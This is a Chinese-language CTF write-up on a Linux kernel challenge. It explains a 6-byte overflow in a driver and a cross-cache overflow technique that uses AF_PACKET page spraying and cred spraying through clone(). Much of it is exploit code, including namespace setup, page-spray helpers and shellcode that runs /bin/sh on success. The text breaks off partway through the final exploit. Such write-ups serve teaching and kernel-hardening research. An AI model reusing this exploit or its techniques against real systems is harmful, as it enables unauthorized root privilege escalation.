27
28
29
30
31
32
typedef struct
{
int64_t idx;
uint64_t size;
char *buf;
}user_req_t;

static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
user_req_t req;
long ret = 0;

if (cmd != ALLOC && copy_from_user(&req, (void *)arg, sizeof(req)))
{
return -1;
}
mutex_lock(&castaway_lock);
switch (cmd)
{
case ALLOC:
ret = castaway_add();
break;
case EDIT:
ret = castaway_edit(req.idx, req.size, req.buf);
break;
default:
ret = -1;
}
mutex_unlock(&castaway_lock);
return ret;
}

给出了用户传参规则,ioctl实现了两种功能,下一个

castaway_add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static long castaway_add(void)
{
int idx;
if (castaway_ctr >= MAX)
{
goto failure_add;
}
idx = castaway_ctr++;
castaway_arr[idx] = kmem_cache_zalloc(castaway_cachep, GFP_KERNEL_ACCOUNT);

if (!castaway_arr[idx])
{
goto failure_add;
}

return idx;

failure_add:
printk(KERN_INFO "castaway chunk allocation failed\n");
return -1;
}

通过自带的 kmem_cache来分配一个obj,然后将其地址给到全局的object数组当中

castaway_edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
typedef struct
{
char pad[OVERFLOW_SZ];
char buf[];
}castaway_t;

static long castaway_edit(int64_t idx, uint64_t size, char *buf)
{
char temp[CHUNK_SIZE];
if (idx < 0 || idx >= MAX || !castaway_arr[idx])
{
goto edit_fail;
}
if (size > CHUNK_SIZE || copy_from_user(temp, buf, size))
{
goto edit_fail;
}
memcpy(castaway_arr[idx]->buf, temp, size);

return size;

edit_fail:
printk(KERN_INFO "castaway chunk editing failed\n");
return -1;
}

这里我们每次调用 memcpy都是从object的第6字节才开始拷贝一整个块的数据,因此存在6字节的溢出

再次查看配置,其中也开启了下面这两个好伙伴

1
2
CONFIG_SLAB_FREELIST_RANDOM=y    
CONFIG_SLAB_FREELIST_HARDENED=y

2.利用思路

按照出题人所说,题目在基本上内核保护全开的情况下,漏洞模块中的 kmem_cache存在隔离且无法复用,并且内容当中不存在任何指针,free_objectfreelist指针也并不在开头而是被放在了中间,给到我们的条件就仅仅只有一个六字节的溢出,似乎已经到了绝境,但是是否有一种方法来打破这层囚笼呢?

事实上确实存在这一手法,既然说我们分配的 object已经隔离了起来,不可能利用不同 kmem_cache之间的 object来实现利用,但是继续往底层考量,我们要知道Linux内核分配,在slub算法之前还存在一个算法,那就是伙伴系统(Buddy System),一切以页为单位的分配均是从他这儿来分配,当然我们的 kmem_cache也不例外,如果我们能进行恰当的布局,就可以使得不同的 kmem_cache相邻,此时我们就可能造成隔离 kmem_cache之间object的溢出!

上图就是其中大致的场景,如果我们的vulnerable kmem_cache同其他通用 kmem_cache出现隔离,我们仍能利用buddy system分配连续块的特性来造成不同结构间的溢出,关于该技巧的细节,可以通过阅读下面博客进行理解

AUTOSLAB应对跨缓存利用的措施

CVE-2022-27666 Page-Level heap fengshui

Google project zero CVE-2017-7308

事实上BitsByWill师傅也推荐了该博客

这里直观上来看就好像是将我们平时用到的object提升了一个量级,变成了slab了

当一个slab页面被释放给伙伴系统时,考虑到该内存页面应该被内核回收,它将在稍后的某个时刻被重用。 cross_cache_overlapping 的技术是释放slab页中的所有 memory slot,或者叫做我们平时讨论的 object ,强制释放slab页。 然后,喷射另一种类型的对象来分配新的slab页面,以回收释放的slab页面。 如果攻击成功,释放的对象的内存将被另一种类型的对象占用。 过去,利用Linux内核内存安全漏洞进行跨缓存攻击的做法并不多见。 在通用缓存中这样做不仅没有必要,而且不稳定。 特别是对于经常使用的通用缓存,攻击会遭受分配不可控带来的噪音,也就是在分配过程中可能分配多种不同类型的结构体。 例如,当内核进行未知分配时,slab 页中所有 memory slot 的释放都会失败,从而导致无法通过另一个slab 页回收该slab 页。 与在通用缓存上执行交叉缓存相比,在专用对象缓存上几乎没有噪音。 这是因为每个分配都会进入自己的缓存,包括来自内核的未知分配,这减少了缓存中未知分配的可能性。 这样,攻击者就可以可靠地释放专用缓存的slab页面来执行跨缓存攻击。

这么说来,这个专用缓存对象对我们来说,既是挑战,也是馈赠~

既然我们准备使用跨缓存对象进行溢出,我们就首先需要堆喷我们的 vulnerable object,同时我们也要堆喷 victim object,并且我们要保证 victim object所位于的 slab要恰好位于 vulnerable object的下方

我们如何来达成上述条件呢,那就需要使用到 Page-Level heap fengshui,也就是页级堆风水

3.页级分配原语

该节参考 Google Project zero writeup

AF_PACKET sockets基础知识

首先就是对于 AF_PACKET sockets的基本解释

AF_PACKET seckets 允许用户在设备驱动程序级别发送或接收数据包,要创建 AF_PACKET sockets,进程必须在管理其网络命名空间的用户命名空间中具有 CAP_NET_RAW 功能。 应该注意的是,如果内核启用了非特权用户命名空间,那么非特权用户就能够创建数据包套接字。

他在大众的认知下往往被常用于 tcpdump对于网络接口包的嗅探,google团队也给出了一个例子,是利用strace来跟踪后面指令使用到的系统调用

1
2
3
4
5
6
7
8
9
10
11
12
# strace tcpdump -i eth0
...
socket(PF_PACKET, SOCK_RAW, 768) = 3
...
bind(3, {sa_family=AF_PACKET, proto=0x03, if2, pkttype=PACKET_HOST, addr(0)={0, }, 20) = 0
...
setsockopt(3, SOL_PACKET, PACKET_VERSION, [1], 4) = 0
...
setsockopt(3, SOL_PACKET, PACKET_RX_RING, {block_size=131072, block_nr=31, frame_size=65616, frame_nr=31}, 16) = 0
...
mmap(NULL, 4063232, PROT_READ|PROT_WRITE, MAP_SHARED, 3, 0) = 0x7f73a6817000
...

这里不放我自己虚拟机的情况是因为我的eth0没怎么经常收发包(bushi

之后也给出利用的具体步骤

  1. 首先创建出一个socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL))
  2. 将该 socket绑定在eth0接口
  3. 环形缓冲区版本通过 socket option:PACKET_VERSION来设置为 TPACKET_V2
  4. 使用 socket option:PACKET_RX_RING 来创建该环形缓冲区
  5. 将环形缓冲区映射在用户空间

经过这一系列系统调用,linux内核将会把通过网络接口eth0的网络packet放入环形缓冲区,然后 tcpdump 再从该缓冲区在用户空间的映射来读取信息

AF_PACKET sockets内核体现

首先当我们创建一个 AF_PACKET socket的时候,会在内核创建下述结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct packet_sock {
/* struct sock has to be the first member of packet_sock */
struct sock sk;

...

struct packet_ring_buffer rx_ring; //通过setsocketopt选项PACKET_RX_RING(recive)来创建
struct packet_ring_buffer tx_ring; //通过setcosketopt选项PACKET_TX_RING(transmit)来创建

...

enum tpacket_versions tp_version; //用来设置环形缓冲区版本

...

int (*xmit)(struct sk_buff *skb);

...
};

下面是对于环形缓冲区数据结构体 struct packet_ring_buffer的解释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
struct pgv {
char *buffer;
};

struct packet_ring_buffer {
struct pgv *pg_vec;

...

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

这里我们的 pg_vec字段是一个指向 struct pgv结构体的指针,然后每一个 struct pgv结构体都包含着一个指向某个 block的指针,如下google团队图

下面我们来看环形缓冲区其中的 prb_bdqc字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/* kbdq - 内核块描述队列 */
struct tpacket_kbdq_core {

...

unsigned short blk_sizeof_priv; //标志着每个block中私有区域的大小

...

char *nxt_offset; //指向活动block内, 同时指向下一个packet保存的地方

...

struct timer_list retire_blk_timer; //描述了在超时时退出当前块的定时器
};

struct timer_list {
struct hlist_node entry;
unsigned long expires;
void (*function)(struct timer_list *);
u32 flags;

#ifdef CONFIG_LOCKDEP
struct lockdep_map lockdep_map;
#endif
};

packet_set_ring()创建ring buffer

我们一般可以通过 packet_setsocketopt函数并且附带特定的socket选项来进行处理socket事件,例如使用 PACKET_VERSION选项来设置环形缓冲区版本

当我们设置 PACKET_RX_RING来创建负责接收的环形缓冲区,其最终会使用 packet_set_ring()函数来进行处理,如下是较为重要部分

首先他会进行一系列检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

然后就会为环形缓冲区分配 block

1
2
3
4
5
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;

alloc_pg_vec函数实际上调用了内核当中的内存分配函数,这里注意是 block_nr个 咱们提供的 order大小,这里的order取决于咱们的 tp_block_size ,也就是 BitsByWill师傅提到他的原因

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
...

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);

...
}

static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

...
}

在最后 packet_set_ring()函数会调用 init_prb_bdqc()函数

1
2
3
4
5
6
7
8
9
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
init_prb_bdqc(po, rb, pg_vec, req_u);

...

}

init_prb_bdqc函数的功能是将环形缓冲区的参数复制到 sturct pack_ring_buffer.prb_bdqc字段,根据计算设置参数,然后设置 block retire timer,最后调用 prb_open_block函数来初始化第一个 block

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;
pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
p1->pkblk_start = pg_vec[0].buffer;
p1->kblk_size = req_u->req3.tp_block_size;
p1->knum_blocks = req_u->req3.tp_block_nr;
p1->hdrlen = po->tp_hdrlen;
p1->version = po->tp_version;
p1->last_kactive_blk_num = 0;
po->stats.stats3.tp_freeze_q_cnt = 0;
if (req_u->req3.tp_retire_blk_tov)
p1->retire_blk_tov = req_u->req3.tp_retire_blk_tov;
else
p1->retire_blk_tov = prb_calc_retire_blk_tmo(po,
req_u->req3.tp_block_size);
p1->tov_in_jiffies = msecs_to_jiffies(p1->retire_blk_tov);
p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
rwlock_init(&p1->blk_fill_in_prog_lock);

p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
prb_init_ft_ops(p1, req_u);
prb_setup_retire_blk_timer(po);
prb_open_block(p1, pbd);
}

prb_open_block()函数中实现的一个功能就是将 struct tpacket_kbdq_core->nxt_offset设置在每个块私有区域之后

1
2
3
4
5
6
7
8
9
10
static void prb_open_block(struct tpacket_kbdq_core *pkc1,
struct tpacket_block_desc *pbd1)
{
...

pkc1->pkblk_start = (char *)pbd1;
pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);

...
}

以上我们就得到了一个内核当中以页为单位的分配原语,这有利于我们进行页级的堆风水

值得注意的是,在BitsByWill师傅的博客中并没有完全采取当初p0团队的分配方式,其中不同的点就是该wp当中使用的是 TPACKET_V1/TPACKET_V2,并且在创建 ring buffer的时候创建的是 PACKET_TX_RING类型的缓冲区,该缓冲区同 PACKET_RX_RING的区别在上面代码注释提了一嘴,但是这并不会影响我们的页分配,如下是我们 packet_setsockopt()部分源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}

可以看到这俩区别在分配的时候不大,最后仍是调用了 packet_set_ring函数,后面的步骤在上面也已经讲解就不多说了

这里需要额外提一下,因为我们直接是调用到了page分配这层,因此我们提供的是 order,而这个order是由我们最开始传入的 (struct tpacket_req_u)req_u->req->tp_block_size来决定的,根据 packet_setsockopt()进行分析不难得出这一点

而我们如果说要释放掉我们分配的 block_nr个相应 order的block,只需要简单的关闭对应 socket的fd指针即可,但是这里仍然会存在一个问题

The only issue is that default low privileged users can’t utilize these functions in the root namespace

也就是说默认的低特权用户不能在root命名空间下用到上面这些函数,但我们通常可以在许多linux系统中创建自己的非特权用户命名空间。虽然说我们仍然可以通过大量堆喷某个数据结构来耗尽我们某个 order下free_list的block, 典型的例子就是常用的 msg_msg了,但他使用通用 slab进行分配不太可靠,最重要的是本题禁止用它了已经 :^(

初步构造思路

出题人给出了一个十分优雅的提权手法,那就是修改 cred,他的好处在于根本不用担心 KASLR,泄露地址,构造ROP链等等,我们都知道在现如今的版本, cred位于一个独立的 kmem_cache当中,名叫 cred_jar,我们可以首先耗尽该 cred_jar,因此未来他将使得分配器从伙伴系统 order_0处分配页面,并且将高阶 order的block进行拆解分配 ,这里我们需要free掉一部分,以免他们进行合并返回高阶 order_*,然后我们需要再次堆喷 cred,然后我们再次释放一些pages,之后再次堆喷攻击对象,并且至少要有一个攻击对象需要在 cred所在slab的正上方

那么该如何大量堆喷 cred结构体呢,我们只需要通过 fork大量创建子进程即可,虽说在 fork的过程中会产生大量噪音(分配过程中对其他无关对象的分配),但作者说这并不影响他们这个初始化堆喷的过程

fork中噪声的处理

在构造页级堆风水的过程当中,对于内存的分配十分严格,因此我们需要尽量减少噪声对于我们的干扰

fork的过程当中,最为核心的函数就是 kernel_clone,我们需要牢记这一点,如果我们在传统 fork调用的过程当中没有设置任何 kernel_clone_args的flag参数,那么就会出现以下步骤:

  1. kernel_clone_args()函数调用 copy_process()函数

  2. copy_process()函数调用 dup_task_truct()函数,他将从目标内核系统中 order_2分配出一个 task_struct数据结构,然后 dup_task_struct() 调用 alloc_thread_stack_node(),如果说没有缓存栈可用的化,那么这个函数将使用 __vmalloc_node_range来分配一个虚拟连续的16kb区域来作为内核线程栈,这里通常会需要分配四个 order_0的pages

  3. 上面的 vmalloc将会分配一个 kmalloc-64的chunk来帮助建立vmalloc虚拟映射,然后,内核将会从 vmap_area_cachep 分配两个 vmap_area chunk。在这个系统和内核当中,第一个是从 alloc_vmap_area当中分配,第二个可能是从 preload_this_cpu_lock中分配

  4. 然后 copy_process()函数将会调用 call_creds(),他将会触发从 prepare_creds()中对于 creds的分配,这里如果设置了 CLONE_THREAD参数的化就不会发生这一步

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    int copy_creds(struct task_struct *p, unsigned long clone_flags)
    {
    struct cred *new;
    int ret;

    #ifdef CONFIG_KEYS_REQUEST_CACHE
    p->cached_requested_key = NULL;
    #endif

    if (
    #ifdef CONFIG_KEYS
    !p->cred->thread_keyring &&
    #endif
    clone_flags & CLONE_THREAD
    ) {
    p->real_cred = get_cred(p->cred);
    get_cred(p->cred);
    alter_cred_subscribers(p->cred, 2);
    kdebug("share_creds(%p{%d,%d})",
    p->cred, atomic_read(&p->cred->usage),
    read_cred_subscribers(p->cred));
    inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1);
    return 0;
    }

    new = prepare_creds();

    ...

  5. 在这之后 copy_process()函数开启了一系列 copy_*()函数,这个*是一系列进程所需要的资源,而这些函数便会触发内存的分配,除非设置了其各自的 CLONE标志,在平常的 fork当中,人们更希望从 files_cache,fs_cache,sighand_cahesignal_cache当中分配新的chunk。其中最大的噪音是当没有设置 CLONE_VM标志位时建立mm_struct而产生的,而这反而会在 vm_area_struct,anon_vma_chainanon_vma等缓存当中触发大量内存分配活动,而这里所有分配都由该系统上的 order_0页面支持

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    if (retval)
    goto bad_fork_cleanup_audit;
    retval = copy_semundo(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_security;
    retval = copy_files(clone_flags, p, args->no_files);
    if (retval)
    goto bad_fork_cleanup_semundo;
    retval = copy_fs(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_files;
    retval = copy_sighand(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_fs;
    retval = copy_signal(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_sighand;
    retval = copy_mm(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_signal;
    retval = copy_namespaces(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_mm;
    retval = copy_io(clone_flags, p);
    if (retval)
    goto bad_fork_cleanup_namespaces;
    retval = copy_thread(p, args);
    if (retval)
    goto bad_fork_cleanup_io;

  6. 最后,内核将分配出一个 pid chunk,其中所属的 slab也来自于 order_0

下面便是忽略vmalloc,仅仅专注于 slab分配的情况下,单一一个 fork调用在这个系统当中将会触发的分配

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
task_struct
kmalloc-64
vmap_area
vmap_area
cred_jar
files_cache
fs_cache
sighand_cache
signal_cache
mm_struct
vm_area_struct
vm_area_struct
vm_area_struct
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
vm_area_struct
pid

可以看到确实产生了很多噪音,在经过 BitsByWill师傅分析源码还有查看clone手册的努力下(bushi,使用以下的flag能极大的降低fork当中产生的噪音:

1
CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

当设置了这些flags之后,我们产生的噪音将会降低至下述情况

1
2
3
4
5
6
7
task_struct
kmalloc-64
vmap_area
vmap_area
cred_jar
signal_cache
pid

注意到这里仍然会由来自于 vmalloc的4个order_0的page。但这对于我们来说是可以接受的。这里还存在的问题是我们的子进程无法真正写入任何进程内存,因为它和父进程共享相同的虚拟内存,所以我们必须使用仅依赖于寄存器的shellcode来检查权限提升是否成功

4.漏洞利用

经过上述一大堆知识的铺垫,现在开始考虑该漏洞的利用,以下是利用的概述

  1. 利用 packet_setsockopt()函数来大量堆喷 order_0的block,并且在每两个分配的pages当中释放其中一个,这样一来我们就拥有了很多 order_0的对象,并且他不会合并到 order_1当中去。而我们最初的exploit是使用fork来开辟一个新的特权用户空间从而使得我们可以在其中使用这些页级分配原语
  2. 然后我们大量使用 clone,并且搭配上面说到的flag参数来分配我们的 credobjects,然后我们释放剩余的 order_0pages,然后我们再次大量堆喷我们的易受攻击的对象,这里会构造出一种我们的 vuln objects所在的page是刚好位于我们某个 credpage的上方

Step I: 前期准备

我们之前分析页级分配原语的时候已经说明,在root的命名空间下我们是无法使用该原语的,所以我们需要开辟一个子进程,然后利用 unshare系统调用来创建一个新的子命名空间并应用到子进程当中,这样我们能保证新创建的子进程是可以使用该页级分配系统原语的

而至于我们页级堆喷的方式,那就是使用管道,让父子进程之间通信,然后传递命令和结果,其中该子进程充当一个中间命令管理的作用

Step II: 排干cred_jar

这里排空他是为了后面我们可以调用fork 来从buddy system获取空页面,但这里的fork并不是fork函数,而是使用了更为精妙的 clone系统调用,他与fork函数的作用基本一致,但是他能实现更为细致的操作,就比如说分配标志的选则

Step III: 堆喷大量page

这里我们就可以利用之前创建的管理页级堆喷的子进程使用setsockopt来大量堆喷单页面,这里需要注意 我们需要提权的命名空间为原本的root命名空间,而我们创建的管理子进程是处于自己的命名空间的,所以我们之后堆喷的victim obj,也就是cred是需要在重新分配的子进程(若没经过设置,他同父进程一样处于root命名空间)当中,这样才可以真正修改某个子进程在root命名空间下的权限,这样我们就可以使得高order的页面均被拆分并且分配,然后我们,然后我们这里仅仅释放每两个页面中的后一页,这里为什么能够保证我们页面都是顺序分配的呢,那是因为我们从伙伴系统高阶拆分的页面在这里会是物理连续的,所以造成了我们基本上可以构造成下面这种情况

Step IV: 分配victim page

这里的victim struct我们选则了上面讲到的 struct cred,这里我们只需要覆盖 cred.usage字段为1即可进行提权,这里是一个位于 struct cred的开头4字节的字段,满足我们溢出6字节的漏洞,

这里存在一定的噪声,也就是额外的4个 order_0页面

Step V: 分配vulnerable obj

也就是释放咱们上面的红色快,这里是为了分配之后咱们的vulnerable ojbect,情况如下:

这样就造成了我们的 cross cache overflow,然后我们在大量越界写的过程当中就会写入我们某个子进程 cred的头六个字节,四字节的1和二字节的0,这里两字节不多不少刚好覆盖原本的 0x3E8

效果如下:

最终exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <assert.h>
#include <time.h>
#include <sys/socket.h>
#include <stdbool.h>

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
printf("\033[0m\033[32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}



#define ALLOC 0xcafebabe
#define DELETE 0xdeadbabe
#define EDIT 0xf00dbabe

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

typedef struct
{
int64_t idx;
uint64_t size;
char *buf;
}user_req_t;

struct tpacket_req{
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define FORK_SPRAY 320
#define CHUNK_SIZE 512
#define ISO_SLAB_LIMIT 8

#define CRED_JAR_INITIAL_SPRAY 32

#define INITIAL_PAGE_SPRAY 1000
#define FINAL_PAGE_SPRAY 30

typedef struct
{
bool in_use;
int idx[ISO_SLAB_LIMIT];
}full_page;

enum spray_cmd {
ALLOC_PAGE,
FREE_PAGE,
EXIT_SPRAY,
};

typedef struct
{
enum spray_cmd cmd;
int32_t idx;
}ipc_req_t;

/* Finally spray vulnurbility pages */
full_page isolation_pages[FINAL_PAGE_SPRAY] = {0};

int rootfd[2];
int sprayfd_child[2];
int sprayfd_parent[2];
int socketfds[INITIAL_PAGE_SPRAY];

int64_t ioctl(int fd, unsigned long request, unsigned long param){
long result = syscall(16, fd, request, param);
if(result < 0)
perror("ioctl on driver");
return result;
}

int64_t alloc(int fd){
return ioctl(fd, ALLOC, 0);
}

int64_t edit(int fd, int64_t idx, uint64_t size, char* buf){
user_req_t req = {.idx = idx, .size = size, .buf = buf};
return ioctl(fd, EDIT, (unsigned long)&req);
}

void debug(){
puts("<STAR PLATINUM, THE WORLD!>");
getchar();
return;
}

void unshare_setup(uid_t uid, gid_t gid)
{
int temp;
char edit[0x100];
unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); //Create new namespace and get in
temp = open("/proc/self/setgroups", O_WRONLY);
write(temp, "deny", strlen("deny"));
close(temp);
temp = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", uid);
write(temp, edit, strlen(edit));
close(temp);
temp = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", gid);
write(temp, edit, strlen(edit));
close(temp);
return;
}
/* *
* __clone - clone syscall in /kernel/fork.c
* @flags: clone flags
* @dest: the ptr of the user_stack
* */
__attribute__((naked)) pid_t __clone(uint64_t flags, void *dest)
{
asm("mov r15, rsi;"
"xor rsi, rsi;"
"xor rdx, rdx;"
"xor r10, r10;"
"xor r9, r9;"
"mov rax, 56;"
"syscall;"
"cmp rax, 0;"
"jl bad_end;"
"jg good_end;"
"jmp r15;"
"bad_end:"
"neg rax;"
"ret;"
"good_end:"
"ret;");
}

struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0};
char throwaway;
char root[] = "root\n";
char binsh[] = "/bin/sh\x00";
char *args[] = {"/bin/sh", NULL};

__attribute__((naked)) void check_and_wait()
{
asm(
"lea rax, [rootfd];"
"mov edi, dword ptr [rax];"
"lea rsi, [throwaway];"
"mov rdx, 1;"
"xor rax, rax;"
"syscall;" //read(rootfd, throwaway, 1)
"mov rax, 102;"
"syscall;" //getuid()
"cmp rax, 0;" // not root, goto finish
"jne finish;"
"mov rdi, 1;"
"lea rsi, [root];"
"mov rdx, 5;"
"mov rax, 1;"
"syscall;" //write(1, root, 5)
"lea rdi, [binsh];"
"lea rsi, [args];"
"xor rdx, rdx;"
"mov rax, 59;"
"syscall;" //execve("/bin/sh", args, 0)
"finish:"
"lea rdi, [timer];"
"xor rsi, rsi;"
"mov rax, 35;"
"syscall;" //nanosleep()
"ret;");
}

int just_wait(){
sleep(1000000000);
}

/* *
* alloc_pages_via_sock - page allocation primitive
* @size: once order-* allocation in page level
* @n: the times you want to allocate
* Return: the new socket fd
* */
int alloc_pages_via_sock(uint32_t size, uint32_t n){
struct tpacket_req req;
int32_t socketfd, version;

/* Create the AF_PACKET socket */
socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if(socketfd < 0){
error_log("Create the AF_PACKET socket failed...");
}

version = TPACKET_V1;

/* Set the ring buffer version */
if(setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
{
error_log("setsocketopt PACKET_VETSION failed...");
}

assert(size % 4096 == 0); //size must be the 4096x*

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = n;
req.tp_frame_size = 4096;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr)/req.tp_frame_size;

/* Allocate the PACKET_TX_RING type ring buffer */
if(setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
{
error_log("setsocketopt PACKET_TX_RING failed!");
}

return socketfd;
}

void spray_comm_handler(){
ipc_req_t req;
int32_t result;

do{
read(sprayfd_child[0], &req, sizeof(req));
assert(req.idx < INITIAL_PAGE_SPRAY);
if(req.cmd == ALLOC_PAGE){
socketfds[req.idx] = alloc_pages_via_sock(4096, 1);
}else if (req.cmd == FREE_PAGE){
close(socketfds[req.idx]);
}
result = req.idx;
write(sprayfd_parent[1], &result, sizeof(result));
}while(req.cmd != EXIT_SPRAY);
}

void send_spray_cmd(enum spray_cmd cmd, int idx){
ipc_req_t req;
int32_t result;

req.cmd = cmd;
req.idx = idx;
/* write to child manager for cmd */
write(sprayfd_child[1], &req, sizeof(req));
/* read from parent pipe which just been writen by child manager */
read(sprayfd_parent[0], &result, sizeof(result));
assert(result == idx);
}

